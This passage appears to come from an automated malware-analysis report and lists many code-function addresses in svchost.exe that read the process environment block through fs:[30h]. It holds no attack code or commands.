            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
